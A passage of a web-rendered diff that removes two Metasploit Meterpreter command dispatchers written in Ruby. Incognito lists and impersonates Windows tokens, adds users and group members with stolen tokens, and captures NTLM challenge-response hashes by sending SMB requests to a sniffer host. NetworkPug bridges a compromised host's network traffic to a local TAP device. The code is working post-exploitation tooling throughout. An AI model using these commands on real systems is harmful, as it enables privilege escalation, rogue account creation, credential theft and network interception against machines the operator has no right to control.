|
-
# Initializes an instance of the priv command interaction.
|
21
|
-
#
|
22
|
-
def initialize(shell)
|
23
|
-
super
|
24
|
-
end
|
25
|
-
|
26
|
-
#
|
27
|
-
# List of supported commands.
|
28
|
-
#
|
29
|
-
def commands
|
30
|
-
{
|
31
|
-
"add_user" => "Attempt to add a user with all tokens",
|
32
|
-
"add_localgroup_user" => "Attempt to add a user to a local group with all tokens",
|
33
|
-
"add_group_user" => "Attempt to add a user to a global group with all tokens",
|
34
|
-
"list_tokens" => "List tokens available under current user context",
|
35
|
-
"impersonate_token" => "Impersonate specified token",
|
36
|
-
"snarf_hashes" => "Snarf challenge/response hashes for every token"
|
37
|
-
}
|
38
|
-
end
|
39
|
-
|
40
|
-
|
41
|
-
@@add_user_opts = Rex::Parser::Arguments.new(
|
42
|
-
"-h" => [ true, "Add user to remote host" ])
|
43
|
-
|
44
|
-
@@add_localgroup_user_opts = Rex::Parser::Arguments.new(
|
45
|
-
"-h" => [ true, "Add user to local group on remote host" ])
|
46
|
-
|
47
|
-
@@add_group_user_opts = Rex::Parser::Arguments.new(
|
48
|
-
"-h" => [ true, "Add user to global group on remote host" ])
|
49
|
-
|
50
|
-
@@list_tokens_opts = Rex::Parser::Arguments.new(
|
51
|
-
"-u" => [ false, "List tokens by unique username" ],
|
52
|
-
"-g" => [ false, "List tokens by unique groupname" ])
|
53
|
-
|
54
|
-
def cmd_list_tokens(*args)
|
55
|
-
token_order = -1
|
56
|
-
|
57
|
-
@@list_tokens_opts.parse(args) { |opt, idx, val|
|
58
|
-
case opt
|
59
|
-
when "-u"
|
60
|
-
token_order = 0
|
61
|
-
when "-g"
|
62
|
-
token_order = 1
|
63
|
-
end
|
64
|
-
}
|
65
|
-
|
66
|
-
if (token_order == -1)
|
67
|
-
print_line("Usage: list_tokens <list_order_option>\n")
|
68
|
-
print_line("Lists all accessible tokens and their privilege level")
|
69
|
-
print_line(@@list_tokens_opts.usage)
|
70
|
-
return
|
71
|
-
end
|
72
|
-
|
73
|
-
system_privilege_check
|
74
|
-
|
75
|
-
tokens = client.incognito.incognito_list_tokens(token_order)
|
76
|
-
|
77
|
-
print_line()
|
78
|
-
print_line("Delegation Tokens Available")
|
79
|
-
print_line("========================================")
|
80
|
-
|
81
|
-
tokens['delegation'].each_line { |string|
|
82
|
-
print(string)
|
83
|
-
}
|
84
|
-
|
85
|
-
print_line()
|
86
|
-
print_line("Impersonation Tokens Available")
|
87
|
-
print_line("========================================")
|
88
|
-
|
89
|
-
tokens['impersonation'].each_line { |string|
|
90
|
-
print(string)
|
91
|
-
}
|
92
|
-
|
93
|
-
print_line()
|
94
|
-
|
95
|
-
return true
|
96
|
-
end
|
97
|
-
|
98
|
-
def cmd_impersonate_token(*args)
|
99
|
-
if (args.length < 1)
|
100
|
-
print_line("Usage: impersonate_token <token>\n")
|
101
|
-
print_line("Instructs the meterpreter thread to impersonate the specified token. All other actions will then be made in the context of that token.\n")
|
102
|
-
print_line("Hint: Double backslash DOMAIN\\\\name (meterpreter quirk)")
|
103
|
-
print_line("Hint: Enclose with quotation marks if name contains a space\n")
|
104
|
-
return
|
105
|
-
end
|
106
|
-
|
107
|
-
system_privilege_check
|
108
|
-
username = args[0]
|
109
|
-
client.incognito.incognito_impersonate_token(username).each_line { |string|
|
110
|
-
print(string)
|
111
|
-
}
|
112
|
-
|
113
|
-
return true
|
114
|
-
end
|
115
|
-
|
116
|
-
def cmd_add_user(*args)
|
117
|
-
# Default to localhost
|
118
|
-
host = "127.0.0.1"
|
119
|
-
|
120
|
-
@@add_user_opts.parse(args) { |opt, idx, val|
|
121
|
-
case opt
|
122
|
-
when "-h"
|
123
|
-
host = val
|
124
|
-
end
|
125
|
-
}
|
126
|
-
|
127
|
-
if (args.length < 2)
|
128
|
-
print_line("Usage: add_user <username> <password> [options]\n")
|
129
|
-
print_line("Attempts to add a user to a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. password does not meet complexity requirements) or when all tokens are exhausted")
|
130
|
-
print_line(@@add_user_opts.usage)
|
131
|
-
return
|
132
|
-
end
|
133
|
-
|
134
|
-
system_privilege_check
|
135
|
-
|
136
|
-
username = args[0]
|
137
|
-
password = args[1]
|
138
|
-
|
139
|
-
client.incognito.incognito_add_user(host, username, password).each_line { |string|
|
140
|
-
print(string)
|
141
|
-
}
|
142
|
-
|
143
|
-
return true
|
144
|
-
end
|
145
|
-
|
146
|
-
def cmd_add_localgroup_user(*args)
|
147
|
-
# Default to localhost
|
148
|
-
host = "127.0.0.1"
|
149
|
-
|
150
|
-
@@add_localgroup_user_opts.parse(args) { |opt, idx, val|
|
151
|
-
case opt
|
152
|
-
when "-h"
|
153
|
-
host = val
|
154
|
-
end
|
155
|
-
}
|
156
|
-
|
157
|
-
if (args.length < 2)
|
158
|
-
print_line("Usage: add_localgroup_user <groupname> <username> [options]\n")
|
159
|
-
print_line("Attempts to add a user to a local group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
|
160
|
-
print_line(@@add_localgroup_user_opts.usage)
|
161
|
-
return
|
162
|
-
end
|
163
|
-
|
164
|
-
system_privilege_check
|
165
|
-
|
166
|
-
groupname = args[0]
|
167
|
-
username = args[1]
|
168
|
-
|
169
|
-
client.incognito.incognito_add_localgroup_user(host, groupname, username).each_line { |string|
|
170
|
-
print(string)
|
171
|
-
}
|
172
|
-
|
173
|
-
return true
|
174
|
-
end
|
175
|
-
|
176
|
-
def cmd_add_group_user(*args)
|
177
|
-
# Default to localhost
|
178
|
-
host = "127.0.0.1"
|
179
|
-
|
180
|
-
@@add_group_user_opts.parse(args) { |opt, idx, val|
|
181
|
-
case opt
|
182
|
-
when "-h"
|
183
|
-
host = val
|
184
|
-
end
|
185
|
-
}
|
186
|
-
|
187
|
-
if (args.length < 2)
|
188
|
-
print_line("Usage: add_group_user <groupname> <username> [options]\n")
|
189
|
-
print_line("Attempts to add a user to a global group on a host with all accessible tokens. Terminates when successful, an error that is not access denied occurs (e.g. user not found) or when all tokens are exhausted")
|
190
|
-
print_line(@@add_group_user_opts.usage)
|
191
|
-
return
|
192
|
-
end
|
193
|
-
|
194
|
-
system_privilege_check
|
195
|
-
|
196
|
-
groupname = args[0]
|
197
|
-
username = args[1]
|
198
|
-
|
199
|
-
client.incognito.incognito_add_group_user(host, groupname, username).each_line { |string|
|
200
|
-
print(string)
|
201
|
-
}
|
202
|
-
|
203
|
-
return true
|
204
|
-
end
|
205
|
-
|
206
|
-
def cmd_snarf_hashes(*args)
|
207
|
-
if (args.length < 1)
|
208
|
-
print_line("Usage: snarf_hashes <sniffer_host>\n")
|
209
|
-
print_line("Captures LANMAN/NTLM challenge response hashes by making SMB requests to the supplied sniffing host with every accessible token.\n")
|
210
|
-
return
|
211
|
-
end
|
212
|
-
|
213
|
-
system_privilege_check
|
214
|
-
|
215
|
-
print_line("[*] Snarfing token hashes...")
|
216
|
-
client.incognito.incognito_snarf_hashes(args[0])
|
217
|
-
print_line("[*] Done. Check sniffer logs")
|
218
|
-
|
219
|
-
return true
|
220
|
-
end
|
221
|
-
|
222
|
-
def system_privilege_check
|
223
|
-
if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
|
224
|
-
print_line("[-] Warning: Not currently running as SYSTEM, not all tokens will be available")
|
225
|
-
print_line(" Call rev2self if primary process token is SYSTEM")
|
226
|
-
end
|
227
|
-
end
|
228
|
-
|
229
|
-
#
|
230
|
-
# Name for this dispatcher
|
231
|
-
#
|
232
|
-
def name
|
233
|
-
"Incognito"
|
234
|
-
end
|
235
|
-
|
236
|
-
end
|
237
|
-
|
238
|
-
end
|
239
|
-
end
|
240
|
-
end
|
241
|
-
end
|
@@ -1,231 +0,0 @@
|
|
1
|
-
require 'rex/post/meterpreter'
|
2
|
-
|
3
|
-
module Rex
|
4
|
-
module Post
|
5
|
-
module Meterpreter
|
6
|
-
module Ui
|
7
|
-
|
8
|
-
# Rex::Ui::Text::IrbShell.new(binding).run
|
9
|
-
|
10
|
-
class Console::CommandDispatcher::NetworkPug
|
11
|
-
|
12
|
-
Klass = Console::CommandDispatcher::NetworkPug
|
13
|
-
|
14
|
-
include Console::CommandDispatcher
|
15
|
-
|
16
|
-
@@options = Rex::Parser::Arguments.new(
|
17
|
-
"-i" => [ true, "Interface on remote machine to listen on" ],
|
18
|
-
"-f" => [ true, "Additional pcap filtering mechanism" ],
|
19
|
-
"-v" => [ false, "Virtual NIC (packets only for your TAP dev locally)" ]
|
20
|
-
)
|
21
|
-
|
22
|
-
def initialize(shell)
|
23
|
-
@thread_stuff = nil
|
24
|
-
@tapdev = nil
|
25
|
-
@channel = nil
|
26
|
-
|
27
|
-
super
|
28
|
-
end
|
29
|
-
|
30
|
-
attr_accessor :thread_stuff
|
31
|
-
attr_accessor :tapdev
|
32
|
-
attr_accessor :channel
|
33
|
-
|
34
|
-
|
35
|
-
#
|
36
|
-
# List of supported commands.
|
37
|
-
#
|
38
|
-
def commands
|
39
|
-
{
|
40
|
-
"networkpug_start" => "Start slinging packets between hosts",
|
41
|
-
"networkpug_stop" => "Stop slinging packets between hosts",
|
42
|
-
}
|
43
|
-
end
|
44
|
-
|
45
|
-
def setup_tapdev
|
46
|
-
# XXX, look at how to use windows equivilient and include
|
47
|
-
|
48
|
-
tapdev = ::File.open("/dev/net/tun", "wb+")
|
49
|
-
|
50
|
-
0.upto(16) { |idx|
|
51
|
-
name = "npug#{idx}"
|
52
|
-
|
53
|
-
ifreq = [ name, 0x1000 | 0x02, "" ].pack("a16va14")
|
54
|
-
|
55
|
-
begin
|
56
|
-
tapdev.ioctl(0x400454ca, ifreq) # is there a better way than hex constant
|
57
|
-
rescue Errno::EBUSY
|
58
|
-
next
|
59
|
-
end
|
60
|
-
|
61
|
-
ifreq = [ name ].pack("a32")
|
62
|
-
|
63
|
-
tapdev.ioctl(0x8927, ifreq)
|
64
|
-
|
65
|
-
# print_line(Rex::Text.hexify(ifreq))
|
66
|
-
|
67
|
-
mac = sprintf("%02x:%02x:%02x:%02x:%02x:%02x", ifreq[18], ifreq[19], ifreq[20], ifreq[21], ifreq[22], ifreq[23])
|
68
|
-
|
69
|
-
return tapdev, name, mac
|
70
|
-
}
|
71
|
-
|
72
|
-
tapdev.close()
|
73
|
-
return nil, nil, nil
|
74
|
-
end
|
75
|
-
|
76
|
-
def proxy_packets()
|
77
|
-
while 1
|
78
|
-
# Ghetto :\
|
79
|
-
|
80
|
-
sd = Rex::ThreadSafe.select([ @channel.lsock, @tapdev ], nil, nil)
|
81
|
-
|
82
|
-
sd[0].each { |s|
|
83
|
-
if(s == @channel.lsock) # Packet from remote host to local TAP dev
|
84
|
-
len = @channel.lsock.read(2)
|
85
|
-
len = len.unpack('n')[0]
|
86
|
-
|
87
|
-
#print_line("Got #{len} bytes from remote host's network")
|
88
|
-
|
89
|
-
if(len > 1514 or len == 0)
|
90
|
-
@tapdev.close()
|
91
|
-
print_line("length is invalid .. #{len} ?, de-synchronized ? ")
|
92
|
-
end
|
93
|
-
|
94
|
-
packet = @channel.lsock.read(len)
|
95
|
-
|
96
|
-
print_line("packet from remote host:\n" + Rex::Text.hexify(packet))
|
97
|
-
|
98
|
-
@tapdev.syswrite(packet)
|
99
|
-
|
100
|
-
elsif(s == @tapdev)
|
101
|
-
# Packet from tapdev to remote host network
|
102
|
-
|
103
|
-
packet = @tapdev.sysread(1514)
|
104
|
-
|
105
|
-
print_line("packet to remote host:\n" + Rex::Text.hexify(packet))
|
106
|
-
|
107
|
-
@channel.write(packet)
|
108
|
-
end
|
109
|
-
} if(sd)
|
110
|
-
|
111
|
-
if(not sd)
|
112
|
-
print_line("hmmm. ")
|
113
|
-
end
|
114
|
-
end
|
115
|
-
end
|
116
|
-
|
117
|
-
def cmd_networkpug_start(*args)
|
118
|
-
# PKS - I suck at ruby ;\
|
119
|
-
|
120
|
-
virtual_nic = false
|
121
|
-
filter = nil
|
122
|
-
interface = nil
|
123
|
-
|
124
|
-
if(args.length == 0)
|
125
|
-
args.unshift("-h")
|
126
|
-
end
|
127
|
-
|
128
|
-
@@options.parse(args) { |opt, idx, val|
|
129
|
-
# print_line("before: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
|
130
|
-
case opt
|
131
|
-
when "-v"
|
132
|
-
virtual_nic = true
|
133
|
-
|
134
|
-
when "-f"
|
135
|
-
filter = val
|
136
|
-
|
137
|
-
when "-i"
|
138
|
-
interface = val
|
139
|
-
|
140
|
-
when "-h"
|
141
|
-
print_error("Usage: networkpug_start -i interface [options]")
|
142
|
-
print_error("")
|
143
|
-
print_error(@@options.usage)
|
144
|
-
end
|
145
|
-
# print_line("after: #{opt} #{idx} #{val} || virtual nic: #{virtual_nic}, filter: #{filter}, interface: #{interface}")
|
146
|
-
|
147
|
-
}
|
148
|
-
|
149
|
-
if (interface == nil)
|
150
|
-
print_error("Usage: networkpug_start -i interface [options]")
|
151
|
-
print_error("")
|
152
|
-
print_error(@@options.usage)
|
153
|
-
return
|
154
|
-
end
|
155
|
-
|
156
|
-
@tapdev, tapname, mac = setup_tapdev
|
157
|
-
|
158
|
-
if(@tapdev == nil)
|
159
|
-
print_status("Failed to create tapdev")
|
160
|
-
return
|
161
|
-
end
|
162
|
-
|
163
|
-
# PKS, we should implement multiple filter strings and let the
|
164
|
-
# remote host build it properly.
|
165
|
-
# not (our conn) and (virtual nic filter) and (custom filter)
|
166
|
-
# print_line("before virtual, filter is #{filter}")
|
167
|
-
|
168
|
-
if(filter == nil and virtual_nic == true)
|
169
|
-
filter = "ether host #{mac}"
|
170
|
-
elsif(filter != nil and virtual_nic == true)
|
171
|
-
filter += " and ether host #{mac}"
|
172
|
-
#print_line("Adjusted filter is #{filter}")
|
173
|
-
end
|
174
|
-
|
175
|
-
print_line("#{tapname} created with a hwaddr of #{mac}, ctrl-c when done")
|
176
|
-
|
177
|
-
response, @channel = client.networkpug.networkpug_start(interface, filter)
|
178
|
-
|
179
|
-
if(@channel)
|
180
|
-
@thread_stuff = Rex::ThreadFactory.spawn("MeterpreterNetworkPUGReceiver", false) {
|
181
|
-
proxy_packets()
|
182
|
-
}
|
183
|
-
|
184
|
-
print_line("Packet slinger for #{interface} has a thread structure of #{@thread_stuff}")
|
185
|
-
end
|
186
|
-
|
187
|
-
return true
|
188
|
-
end
|
189
|
-
|
190
|
-
def cmd_networkpug_stop(*args)
|
191
|
-
interface = args[0]
|
192
|
-
if (interface == nil)
|
193
|
-
print_error("Usage: networkpug_stop [interface]")
|
194
|
-
return
|
195
|
-
end
|
196
|
-
|
197
|
-
client.networkpug.networkpug_stop(interface)
|
198
|
-
|
199
|
-
#print_line("client.networkpug.networkpug_stop returned")
|
200
|
-
|
201
|
-
if(@thread_stuff)
|
202
|
-
# print_line("killing thread")
|
203
|
-
@thread_stuff.kill
|
204
|
-
|
205
|
-
#print_line("joining thread")
|
206
|
-
#@thread_stuff.join
|
207
|
-
# meterpreter dies if i try to join.. not sure why.
|
208
|
-
|
209
|
-
@thread_stuff = nil
|
210
|
-
|
211
|
-
#print_line("closing tapdev")
|
212
|
-
@tapdev.close
|
213
|
-
|
214
|
-
#print_line("closing channel")
|
215
|
-
#@channel.close
|
216
|
-
end
|
217
|
-
|
218
|
-
print_status("Packet slinging stopped on #{interface}")
|
219
|
-
return true
|
220
|
-
end
|
221
|
-
|
222
|
-
def name
|
223
|
-
"NetworkPug"
|
224
|
-
end
|
225
|
-
|
226
|
-
end
|
227
|
-
|
228
|
-
end
|
229
|
-
end
|
230
|
-
end
|
231
|
-
end
|